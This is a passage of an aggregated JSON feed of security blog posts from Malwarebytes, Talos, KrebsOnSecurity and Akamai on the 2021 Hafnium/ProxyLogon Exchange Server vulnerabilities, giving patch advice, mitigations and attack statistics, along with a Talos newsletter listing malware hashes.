[**CVE-2021-27065**](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>): Microsoft Exchange Server Remote Code Execution Vulnerability. This vulnerability is part of an attack chain. The initial attack requires the ability to make an untrusted connection to Exchange server port 443.\n\nThey all look the same. Boring you said? Read on!\n\n### The attack chain\n\nWhile the CVE description is the same for the 4 CVE\u2019s we can learn from the report by the security firm that discovered the attacks, Volexity, that CVE-2021-26855 is a server-side request forgery (SSRF) vulnerability in Exchange that was used to steal mailbox content. The Remote Code Execution (RCE) vulnerability CVE-2021-26857 was used to run code under the System account. The other two zero-day flaws \u2014 CVE-2021-26858 and CVE-2021-27065 \u2014 would allow an attacker to write a file to any part of the server.\n\nTogether these 4 vulnerabilities form a powerful attack chain which only requires the attacker to find the server running Exchange, and the account from which they want to extract email. After exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised servers to gain persistence and make more changes. Web shells can allow attackers to steal data and perform additional malicious actions.\n\n### Urgent patching necessary\n\nEven though the use of the vulnerabilities was described as \u201climited\u201d, now that the information has been made public, we may see a quick rise in the number of attacks. Especially since the attack does not require a lot of information about the victim to start with.\n\nOr as Microsoft\u2019s vice president for customer security Tom Burt put it:\n\n> \u201cEven though we\u2019ve worked quickly to deploy an update for the Hafnium exploits, we know that many nation-state actors and criminal groups will move quickly to take advantage of any unpatched systems.\u201d\n\nUsers of Microsoft Exchange Server 2013, Microsoft Exchange Server 2016, and Microsoft Exchange Server 2019 are advised to apply the updates immediately to protect against these exploits, prioritizing the externally facing Exchange servers.\n\nMicrosoft also advises that the initial stage of the attack can be stopped by "restricting untrusted connections, or by setting up a VPN to separate the Exchange server from external access", although the other parts of the attack chain can still be exploited, if other means of access are used.\n\n### Update March 4, 2021\n\nThe Cybersecurity and Infrastructure Security Agency issued an [emergency directive](<https://cyber.dhs.gov/ed/21-02/>) after CISA partners observed active exploitation of vulnerabilities in Microsoft Exchange _on-premises_ products. The directive gives detailed instructions for agencies to follow immediately after identifying all instances of on-premises Microsoft Exchange Servers in their environment.\n\nFor readers that are interested in the more technical details of the attack chain, [Veloxity published a blog](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) that provides details about their investigation, the vulnerabilities, and which also includes IOCs.\n\n### Update March 5, 2021\n\nIt turns out that [CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) was discovered in December of 2020 by DEVCORE who named the vulnerability ProxyLogon. They called it [ProxyLogon](<https://proxylogon.com/>) because this bug exploits against the Exchange **Proxy** Architecture and **Logon** mechanism. After DEVCORE chained the bugs together to a workable pre-auth RCE exploit, they sent an advisory and exploit to Microsoft through the MSRC portal. The entire timeline can be found [here](<https://proxylogon.com/#timeline>).\n\n### Update March 8, 2021\n\nMicrosoft has released an [updated script that scans Exchange log files](<https://github.com/microsoft/CSS-Exchange/tree/main/Security>) for indicators of compromise (IOCs) associated with the vulnerabilities disclosed on March 2, 2021. The US Cybersecurity & Infrastructure Security Agency (CISA) has [issued a warning](<https://us-cert.cisa.gov/ncas/current-activity/2021/03/06/microsoft-ioc-detection-tool-exchange-server-vulnerabilities>) that it is aware of widespread domestic and international exploitation of these vulnerabilities and strongly recommends organizations run the script as soon as possible.\n\nMicrosoft has also added definitions to its standalone malware scanner, the [Microsoft Safety Scanner](<https://docs.microsoft.com/en-us/windows/security/threat-protection/intelligence/safety-scanner-download>) (also known as the Microsoft Support Emergency Response Tool or MSERT), so that it detects web shells.\n\nMalwarebytes detects web shells planted on comprised Exchange servers as [Backdoor.Hafnium](<https://blog.malwarebytes.com/detections/backdoor-hafnium/>). You can read more about the use of web shells in Exchange server attacks in our article [Microsoft Exchange attacks cause panic as criminals go shell collecting](<https://blog.malwarebytes.com/malwarebytes-news/2021/03/microsoft-exchange-attacks-cause-panic-as-criminals-go-shell-collecting/>).\n\n### Update March 12, 2021\n\nThe abuse of these vulnerabilities has sky-rocketed, and the first public proof-of-concept (PoC) exploit for the ProxyLogon flaws has appeared on GitHub, only to be taken down by the site. In spite of Microsoft's efforts, cybercriminals have shown in numbers that they are exploiting this opportunity to the fullest.\n\nA new form of ransomware has also entered the mix. Detections for DearCry, a new form of human-operated ransomware that's deployed through compromised Exchange servers, began yesterday. When the ransomware was still unknown, it would have been detected by Malwarebytes proactively, as Malware.Ransom.Agent.Generic. \n\nYou can read more about DearCry ransomware attacks in our article [Ransomware is targeting vulnerable Microsoft Exchange servers](<https://blog.malwarebytes.com/ransomware/2021/03/ransomware-is-targeting-vulnerable-microsoft-exchange-servers/>).\n\n### Update March 16, 2021\n\nMicrosoft has released a new, one-click mitigation tool for Exchange Server deployments. The Microsoft Exchange On-Premises Mitigation Tool will help customers who do not have dedicated security or IT teams to apply these security updates. This new tool is designed as an interim mitigation for customers who are unfamiliar with the patch/update process or who have not yet applied the on-premises Exchange security update.\n\nDetails, a [download link](<https://aka.ms/eomt>), user instructions, and more information can be found in the [Microsoft Security Response Center](<https://msrc-blog.microsoft.com/2021/03/15/one-click-microsoft-exchange-on-premises-mitigation-tool-march-2021/>). \n\nWe will keep you posted as we gather more information about these ransomware attacks.\n\nStay safe, everyone!\n\nThe post [Patch now! Exchange servers attacked by Hafnium zero-days](<https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/>) appeared first on [Malwarebytes Labs](<https://blog.malwarebytes.com>).", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-03T12:34:27", "type": "malwarebytes", "title": "Patch now! Exchange servers attacked by Hafnium zero-days", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-03T12:34:27", "id": "MALWAREBYTES:B4D157FAC0EB655355514D120382CC56", "href": "https://blog.malwarebytes.com/exploits-and-vulnerabilities/2021/03/patch-now-exchange-servers-attacked-by-hafnium-zero-days/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "talosblog": [{"lastseen": "2021-03-10T14:27:54", "description": "Microsoft released patches for four vulnerabilities in Exchange Server on March 2, disclosing that these vulnerabilities were being exploited by a previously unknown threat actor, referred to as HAFNIUM. The vulnerabilities in question \u2014 CVE-2021-26855, CVE-2021-26857, CVE-2021-26858 and CVE-2021-27065 \u2014 affect Microsoft Exchange Server 2019, 2016, 2013 and the out-of-support Microsoft Exchange Server 2010. The patches for these vulnerabilities should be applied as soon as possible. Microsoft... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-03-08T10:18:43", "type": "talosblog", "title": "Threat Advisory: HAFNIUM and Microsoft Exchange zero-day", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-08T10:18:43", "id": "TALOSBLOG:AC8ED8970F5692A325A10D93B7F0D965", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/YIQrIoqvPyk/threat-advisory-hafnium-and-microsoft.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-04-28T12:42:45", "description": "Pulse Secure announced that a critical vulnerability (CVE-2021-22893) was discovered in their VPN service \"Pulse Secure Connect\" in a recent security advisory. The advisory states that, \"a vulnerability was discovered under Pulse Connect Secure (PCS). This includes an authentication by-pass... \n \n[[ This is only the beginning! Please visit the blog for the complete entry ]]", "cvss3": {}, "published": "2021-04-22T10:29:36", "type": "talosblog", "title": "Threat Advisory: Pulse Secure Connect Coverage", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2021-22893"], "modified": "2021-04-22T10:29:36", "id": "TALOSBLOG:0043F629DC5E8DA26934B2407F1C76CC", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/-Iuyklcv1Qc/pulse-vpn-coverage.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-01-30T19:31:49", "description": "[](<http://4.bp.blogspot.com/-YLRBgfX54uk/XKYbVrHlGXI/AAAAAAAAFu8/MxjUEd-3hhQTW4tZkat-cLDi8G5tVm6bgCK4BGAYYCw/s1600/threat-source.png>) \n_Newsletter compiled by Jon Munshaw._ \n \nWelcome to this week\u2019s Threat Source newsletter \u2014 the perfect place to get caught up on all things Talos from the past week. \n \nBe sure to pay close attention Tuesday for [some changes we have coming to Snort.org](<https://blog.snort.org/2020/01/area-under-construction-snort.html>). We\u2019ll spare you the details for now, but please bear with us if the search function isn\u2019t working correctly for you or you see anything else wonky on the site. \n \nAnd, as always, we have the [latest Threat Roundup](<https://blog.talosintelligence.com/2020/01/threat-roundup-0117-0124.html>) where we go through the top threats we saw \u2014 and blocked \u2014 over the past week. \n\n\n### Upcoming public engagements\n\n**Event: **A World of Threats: When DNS becomes the new weapon for governments at [Swiss Cyber Security Days](<https://swisscybersecuritydays.ch/en/programme-en/>)** ** \n**Location: **Forum Fribourg, Granges-Paccot, Switzerland \n**Date: **Feb. 12 - 13 \n**Speakers: **Paul Rascagn\u00e8res \n**Synopsis: **In this presentation, Paul will present two threat actors Cisco Talos has been tracking who are manipulating the DNS system. On Jan. 22, 2019, the U.S. DHS published a directive concerning this attack vector. We will present the timeline for these events and their technical details. One of the actors is behind the campaign we named \u201cSea Turtle.\u201d This actor is more advanced and more aggressive than others we\u2019ve observed in the past. They do not hesitate to directly target registrars and one registry. The talk will break down these two actors and the methodology used to target the victims. \n \n\n\n### Cyber Security Week in Review\n\n * State-sponsored actors linked to Turkey are believed to be [behind a recent wave of cyber attacks](<https://www.reuters.com/article/us-cyber-attack-hijack-exclusive/exclusive-hackers-acting-in-turkeys-interests-believed-to-be-behind-recent-cyberattacks-sources-idUSKBN1ZQ10X>) targeting governments in the Middle East and Asia. The attackers are using a technique called DNS hijacking that shows similarities to the Sea Turtle actor Cisco Talos discovered last year. \n * Facebook executives backed the security of its WhatsApp messaging software, saying it [could not have been at fault](<https://www.inc.com/jason-aten/facebook-says-apple-is-to-blame-for-hacking-of-jeff-bezos-phone.html>) for the hacking of Amazon CEO Jeff Bezos\u2019 phone. Reports state Bezos was sent a malicious video through WhatsApp and opened it, leading to the installation of spyware. However, Facebook laid the blame at the feet of Apple and iOS\u2019 security. \n * The Bezos incident has led to many wealthy individuals reaching out to cyber security vendors for [private assistance with security](<https://www.ft.com/content/96c79040-40ea-11ea-bdb5-169ba7be433d>). For example, one group is working on an information-sharing platform for cyber attacks targeting members of royal families across the globe. \n * Dozens of United Nations servers and user accounts were [breached during an August cyber attack](<https://www.thenewhumanitarian.org/investigation/2020/01/29/united-nations-cyber-attack>), according to new leaked reports. Staff members working in the UN\u2019s Geneva, Switzerland office were reportedly told to change their passwords but were not made aware of the breach. \n * The Japanese government [adopted a series of new policies](<https://www.infosecurity-magazine.com/news/japan-considers-emergency/>) this week designed to protect government services from a cyber attack during the upcoming Summer Olympics. A special panel called on infrastructure and public transportation services to investigate any potential vulnerabilities in their systems due to the use of internet-of-things devices, and report those flaws immediately to an administrator. \n * Cisco [launched a new security architecture platform for IoT devices](<https://securityboulevard.com/2020/01/cisco-launches-iot-security-platform/>) this week. Cisco Cyber Vision provides users with software and services backed by Talos\u2019 intelligence to identify threats and vulnerabilities in IoT assets in real-time. \n * Facebook [agreed to pay $550 million](<https://techcrunch.com/2020/01/29/facebook-will-pay-550-million-to-settle-class-action-lawsuit-over-privacy-violations/>) as part of a settlement of a class-action lawsuit in Illinois. The suit alleged Facebook violated a state law by using facial recognition technology to auto-tag users in photos without obtaining their consent. \n * The actor behind the Maze ransomware [dumped a large amount of victim data online](<https://arstechnica.com/information-technology/2020/01/dozens-of-companies-have-data-dumped-online-by-ransomware-ring-seeking-leverage/>) this week, including information from an Ohio community college and a grocery store chain in Michigan. Administrators of Maze\u2019s website said in a message that they were sparing recent victim Parkland, Florida, but still leaked some data to prove that they were hacked. \n * The [latest security update to iOS](<https://threatpost.com/apple-patches-ios-device-tracking/152364/>) allows users to disable a location-tracking feature used by many apps. The latest patches also fixed a critical remote code execution vulnerability in the WebKit browsing engine. \n\n \n\n\n### Notable recent security issues\n\n**Title: **[Cisco urging users to update Firepower Management Center immediately to fix severe bug](<https://www.zdnet.com/article/cisco-patch-this-critical-firewall-bug-in-firepower-management-center/>) \n**Description: **Cisco disclosed a high-severity vulnerability in its Firepower Management Center last week that could allow an attacker to bypass the usual authentication steps. The vulnerability \u2014 which was assigned a 9.8 severity score out of 10 \u2014 exists in the way Firepower handles LDAP authentication responses from an external authentication server. An attacker could exploit this flaw by sending a specially crafted HTTP request to the device. Users are also encouraged to turn off LDAP configuration on their devices. Cisco also disclosed seven high-severity flaws and 19 medium-severity security issues in some of its other products, including Smart Software Manager. \n**Snort SIDs: **52627 \u2013 52632, 52641 - 52646 \n** \n****Title: **[Exploitation of Citrix vulnerability spikes after POC released, patches followed](<https://threatpost.com/citrix-patch-rollout-critical-rce-flaw/152041/>) \n**Description: **Citrix rushed out a patch for its Application Delivery Controller (ADC) and Citrix Gateway products after proof of concept code leaked for a major vulnerability. The company first disclosed CVE-2019-19781 in December, saying a patch was forthcoming. But security researchers have noticed an uptick in exploitation attacks, forcing Citrix to move up its timeline. \n**Snort SIDs: **52620 \n\n\n### Most prevalent malware files this week\n\n**SHA 256:** [85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5](<https://www.virustotal.com/gui/file/85b936960fbe5100c170b777e1647ce9f0f01e3ab9742dfc23f37cb0825b30b5/details>) \n**MD5: **8c80dd97c37525927c1e549cb59bcbf3 \n**Typical Filename:** eternalblue-2.2.0.exe \n**Claimed Product: **N/A \n**Detection Name: **W32.85B936960F.5A5226262.auto.Talos \n \n**SHA 256: **[3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3](<https://www.virustotal.com/gui/file/3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3/details>) \n**MD5: **47b97de62ae8b2b927542aa5d7f3c858 \n**Typical Filename: **qmreportupload.exe \n**Claimed Product:** qmreportupload \n**Detection Name: **Win.Trojan.Generic::in10.talos \n \n**SHA 256: **[c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94** **](<https://www.virustotal.com/gui/file/c0cdd2a671195915d9ffb5c9533337db935e0cc2f4d7563864ea75c21ead3f94/details>) \n**MD5: **7c38a43d2ed9af80932749f6e80fea6f \n**Typical Filename: **xme64-520.exe \n**Claimed Product: **N/A** ** \n**Detection Name: **PUA.Win.File.Coinminer::1201 \n \n**SHA 256: **[c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f](<https://www.virustotal.com/gui/file/c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f/details>) \n**MD5:** e2ea315d9a83e7577053f52c974f6a5a \n**Typical Filename: **c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f \n**Claimed Product: **N/A \n**Detection Name:** W32.AgentWDCR:Gen.21gn.1201 \n** \n****SHA 256: **[d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258](<https://www.virustotal.com/gui/file/d91abcd024d4172fadc5aa82750a18796a549207b76f624b8a9d165459379258/details>)** ** \n**MD5:** a917d39a8ef125300f2f38ff1d1ab0db \n**Typical Filename: **FFChromeSetters \n**Claimed Product: **N/A \n**Detection Name: **PUA.Osx.Adware.Macsearch::agent.tht.talos \n \nKeep up with all things Talos by following us on [Twitter](<https://twitter.com/talossecurity?lang=en>). [Snort](<https://twitter.com/snort?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>), [ClamAV](<https://twitter.com/clamav?ref_src=twsrc%5Egoogle%7Ctwcamp%5Eserp%7Ctwgr%5Eauthor>) and [Immunet](<https://twitter.com/immunet?lang=en>) also have their own accounts you can follow to keep up with their latest updates. You can also subscribe to the Beers with Talos podcast [here](<https://itunes.apple.com/us/podcast/beers-with-talos-podcast/id1236329410>) (as well as on your favorite podcast app). And, if you\u2019re not already, you can also subscribe to the weekly Threat Source newsletter [here](<https://engage2demand.cisco.com/SubscribeTalosThreatSource>). \n\n", "cvss3": {}, "published": "2020-01-30T11:00:12", "type": "talosblog", "title": "Threat Source newsletter (Jan. 30, 2020)", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2019-19781"], "modified": "2020-01-30T11:00:12", "id": "TALOSBLOG:7192A351B37E9A67C1A5DB760A14DA7E", "href": "http://feedproxy.google.com/~r/feedburner/Talos/~3/VpsmXEgBYno/threat-source-newsletter-jan-30-2020.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "krebs": [{"lastseen": "2021-03-10T12:47:11", "description": "**Microsoft Corp.** today released software updates to plug four security holes that attackers have been using to plunder email communications at companies that use its **Exchange Server** products. The company says all four flaws are being actively exploited as part of a complex attack chain deployed by a previously unidentified Chinese cyber espionage group.\n\n\n\nThe software giant typically releases security updates on the second Tuesday of each month, but it occasionally deviates from that schedule when addressing active attacks that target newly identified and serious vulnerabilities in its products.\n\nThe patches released today fix security problems in **Microsoft Exchange Server 2013**, **2016** and **2019**. Microsoft said its **Exchange Online** service -- basically hosted email for businesses -- is not impacted by these flaws.\n\nMicrosoft credited researchers at Reston, Va. based [Volexity](<https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities/>) for reporting the attacks. Volexity **President Steven Adair** told KrebsOnSecurity it first spotted the attacks on Jan. 6, 2021.\n\nAdair said while the exploits used by the group may have taken great skills to develop, they require little technical know-how to use and can give an attacker easy access to all of an organization's email if their vulnerable Exchange Servers are directly exposed to the Internet.\n\n"These flaws are very easy to exploit," Adair said. "You don't need any special knowledge with these exploits. You just show up and say 'I would like to break in and read all their email.' That's all there is to it."\n\nMicrosoft says the flaws are being used by a previously unknown Chinese espionage group that's been dubbed "**Hafnium**," which is known to launch its attacks using hosting companies based in the United States.\n\n"Hafnium primarily targets entities in the United States across a number of industry sectors, including infectious disease researchers, law firms, higher education institutions, defense contractors, policy think tanks, and NGOs," Microsoft said. "HAFNIUM has previously compromised victims by exploiting vulnerabilities in internet-facing servers. Once they\u2019ve gained access to a victim network, HAFNIUM typically exfiltrates data to file sharing sites like MEGA."\n\nAccording to Microsoft, Hafnium attackers have been observed combining all four zero-day flaws to target organizations running vulnerable Exchange Server products.\n\n[CVE-2021-26855](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26855>) is a "server-side request forgery" (SSRF) flaw, in which a server (in this case, an on-premises Exchange Server) can be tricked into running commands that it should never have been permitted to run, such as authenticating as the Exchange server itself.\n\nThe attackers used [CVE-2021-26857](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26857>) to run code of their choice under the "system" account on a targeted Exchange server. The other two zero-day flaws -- [CVE-2021-26858](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-26858>) and [CVE-2021-27065](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-27065>) -- could allow an attacker to write a file to any part of the server.\n\nAfter exploiting these vulnerabilities to gain initial access, Hafnium operators deployed web shells on the compromised server, Microsoft said. Web shells are essentially software backdoors that allow attackers to steal data and perform additional malicious actions that lead to further compromise.\n\nNeither Microsoft nor Volexity is aware of publicly available code that would allow other cybercriminals to exploit these Exchange vulnerabilities. But given that these attacks are in the wild now, it may only be a matter of days before exploit code is publicly available online.\n\nMicrosoft stressed that the exploits detailed today were in no way connected to the [separate SolarWinds-related attacks](<https://krebsonsecurity.com/?s=solar+winds&x=0&y=0>). "We continue to see no evidence that the actor behind SolarWinds discovered or exploited any vulnerability in Microsoft products and services," the company said.\n\nFurther reading:\n\n[Microsoft's writeup on new Hafnium nation state cyberattacks](<https://blogs.microsoft.com/on-the-issues/2021/03/02/new-nation-state-cyberattacks/>)\n\n[Microsoft technical advisory on the four Exchange Server flaws](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>)", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-02T21:19:17", "type": "krebs", "title": "Microsoft: Chinese Cyberspies Used 4 Exchange Server Flaws to Plunder Emails", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-02T21:19:17", "id": "KREBS:65D25A653F7348C7F18FFD951447B275", "href": "https://krebsonsecurity.com/2021/03/microsoft-chinese-cyberspies-used-4-exchange-server-flaws-to-plunder-emails/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "akamaiblog": [{"lastseen": "2021-03-15T22:39:29", "description": "Co-authored by Ryan Barnett.\n\n### AppSec Protections for Microsoft Exchange CVE-2021-26855, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065\n\nOn March 2, 2021, the Microsoft Security Response Center alerted its customers to [several critical security updates](<https://msrc-blog.microsoft.com/2021/03/02/multiple-security-updates-released-for-exchange-server/>) to Microsoft Exchange Server, addressing vulnerabilities currently under attack. \n\nThe United States Computer Emergency Readiness Team Cybersecurity and Infrastructure Security Agency also issued an [alert with recommendations](<https://us-cert.cisa.gov/ncas/alerts/aa21-062a>) on how to mitigate the vulnerabilities. \n\n * [CVE-2021-26855](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26855>) allows an unauthenticated attacker to send arbitrary HTTP requests and authenticate as the Exchange Server. The vulnerability exploits the Exchange Control Panel (ECP) via a Server-Side Request Forgery (SSRF). This would also allow the attacker to gain access to mailboxes and read sensitive information.\n * [CVE-2021-26857](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26857>), [CVE-2021-26858](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-26858>), and [CVE-2021-27065](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-27065>) allow for remote code execution.\n * CVE-2021-26858 and CVE-2021-27065 are similar post-authentication arbitrary write file vulnerabilities in Exchange. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could write a file to any path on the server. \n\n * CVE-2021-26857 is an insecure deserialization vulnerability in the Unified Messaging service. An attacker, authenticated either by using CVE-2021-26855 or via stolen admin credentials, could execute arbitrary code as SYSTEM on the Exchange Server\n * To locate a possible compromise of these CVEs, we encourage you to read the [Microsoft Advisory](<https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers/>).\n\n### How Akamai Can Help \n\n\nCustomers that use Akamai Web Application Firewall solutions, Kona Site Defender and Web Application Protector, with the Automated Attack Groups engine have received an automatic update for protection. Akamai recommends that customers using Automated Attack Groups set all their attack groups, but specifically the Web Platform Attack Group, to Deny to prevent these exploitation attempts.\n\nKona Site Defender customers using Kona Rule Set (KRS) should update their profile and enable newly released rules ID 3000083 and 3000084 in the Total Request Score (Inbound) attack group in order to protect against attempts to exploit the following CVEs:\n\n * CVE-2021-26855, which is the SSRF vulnerability\n * CVE-2021-27065, which is being used to upload webshells\n\n**Akamai recommends that either the attack group or the individual KRS rules be put into Deny mode to protect against attempts to exploit these vulnerabilities.**\n\nAkamai's research and intelligence teams observed that attackers have been quick to automate their target identification and exploitation attempts. A variety of existing controls in Akamai's security portfolio are designed to detect these attempts:\n\n 1. Web Application Firewall \\-- Rate Controls, TOR IP Blocklist, and Penalty Box are all also detecting and blocking this scanning traffic\n 2. Client Reputation \\-- the \"Web Scanner\" and \"Web Attacker\" categories are identifying many attackers searching for vulnerable targets\n 3. Bot Management \\-- controls detect the incoming traffic to be automated or from anonymous proxies\n\nIf you have any questions, please reach out to Akamai Support Services or your account team.\n\n## Global Attack Intelligence\n\nOver the last 48 hours on our global platform we have observed:\n\n * 290,000 unique attempts to scan and/or exploit these vulnerabilities\n * 952 unique IPs involved in these attempts \n * 731 of these unique IPs were identified by Akamai Client Reputation threat intelligence as known web scanners or web attackers with a median score of 9.6 out of 10\n * 23,910 unique hosts targeted\n * 80% of attack activity targeted against Commerce, High-Tech, Financial Services, and Manufacturing verticals\n * 90% of all attack attempts targeted against organizations in the United States, Austria, India, Canada, Germany, France and the United Kingdom\n * Assetnote and Qualys were the top two known scanners\n\n[  ](<https://blogs.akamai.com/Microsoftblog2.png>) **Figure**: Attack sources; the top number represents the number of requests and the bottom number represents the number of IPs\n\n## Conclusion and Recommended Steps\n\nWe've confirmed active attempts of exploitation of Microsoft Exchange/Outlook Web Access zero-day vulnerabilities.\n\nSuccessful exploitation allows an unauthenticated attacker to execute arbitrary code and install webshells on vulnerable Exchange Servers, enabling the attacker to gain persistent system access, as well as access to files and mailboxes on the server and to credentials stored on that system.\n\nMitigation and remediation can be achieved by following these steps:\n\n 1. Akamai customers that have Exchange/Outlook Web Access protected by either Kona Site Defender using the Automated Attack Groups rule set or the Web Application Protector product have already received an automatic update to the Platform Attacks Group. Kona Site Defender customers that are using the Kona Rule Set, however, need to take steps to activate the new rules to receive protection.\n 2. Customers should also deploy updates to affected Exchange Servers as recommended by Microsoft and enable the Akamai protections as recommended above.\n 3. Customers should investigate for exploitation or indicators of persistence.\n 4. Customers should remediate any identified exploitation or persistence and investigate their environment for indicators of lateral movement or further compromise.\n\nCompanies should consider implementing Zero Trust Network Access (ZTNA) to be able to weather software vulnerabilities like these. Unlike the traditional \"verify, then trust\" model -- which means if someone has the correct user credentials, they are admitted to whichever site, app, or device they are requesting -- ZTNA dictates that users and devices are never trusted and can only access applications and data after passing a secure authentication and authorization process that does not solely rely on user credentials. You can read more about how ZTNA can protect corporate resources in the context of these Microsoft Exchange vulnerabilities in the blog post, [Microsoft Exchange and Verkada Hacks: Isolate Your Apps & APIs from the Internet Cesspool: Isolate Your Apps and APIs from the Internet Cesspool](<https://blogs.akamai.com/2021/03/microsoft-exchange-and-verkada-hacks-isolate-your-apps-and-apis-from-the-internet-cesspool.html>).\n\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-03-15T22:30:00", "type": "akamaiblog", "title": "How Akamai Can Help You Fight the Latest Exploitation Attempts Against Microsoft Exchange", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27065"], "modified": "2021-03-15T21:41:53", "id": "AKAMAIBLOG:BB43372E19E8CF90A965E98130D0C070", "href": "http://feedproxy.google.com/~r/TheAkamaiBlog/~3/q7n8HyPxlM4/appsec-protections-for-microsoft-exchange-cve-2021-26855-cve-2021-26857-cve-2021-26858-cve-2021-2706.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-15T22:39:29", "description": "It's been an interesting start to March in terms of public security 